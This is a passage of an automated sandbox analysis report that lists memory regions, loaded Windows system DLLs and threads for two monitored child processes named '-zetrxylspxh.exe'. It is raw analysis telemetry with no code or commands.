"pagefile_0x000000007feb0000" filename = "" Region: id = 7207 start_va = 0x5f0000 end_va = 0x6adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7208 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7209 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7210 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7211 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 7212 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 7213 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7214 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7530 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7531 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7532 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7533 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7534 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7535 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7536 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7537 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7538 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7539 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7540 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7541 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7542 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7543 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7544 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7545 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7801 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7802 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7803 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 7804 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 251 os_tid = 0x107c Thread: id = 270 os_tid = 0x129c Process: id = "86" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x1411000" os_pid = "0x10a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6825 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6826 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6827 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6828 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6829 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6830 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6831 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6832 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6833 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6834 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6835 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6836 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6837 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6838 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6839 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6840 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7242 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7243 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7244 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7245 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7246 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7247 start_va = 0x510000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 7248 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7249 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7250 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7251 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7252 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7253 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7561 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7562 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 7563 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 7564 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7565 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7566 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7567 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7568 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7569 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7570 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7571 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7572 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7573 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7574 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7575 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7576 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7577 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7578 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7579 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7580 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7581 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7582 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7583 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7808 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7809 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 7810 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 253 os_tid = 0x124c Thread: id = 279 os_tid = 0xb90 Process: id = "87" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x3c716000" os_pid = "0x106c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6847 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6848 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6849 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6850 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6851 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6852 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6853 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6854 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6855 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6856 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6857 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6858 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6859 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6860 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6861 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6862 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7254 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 7255 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7256 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7257 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7258 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7259 start_va = 0x580000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7260 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7261 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7262 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7263 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7264 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7265 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7584 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7585 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7586 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7587 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 7588 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7589 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7590 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7591 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7592 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7593 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7594 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7595 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7596 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7597 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7598 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7599 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = 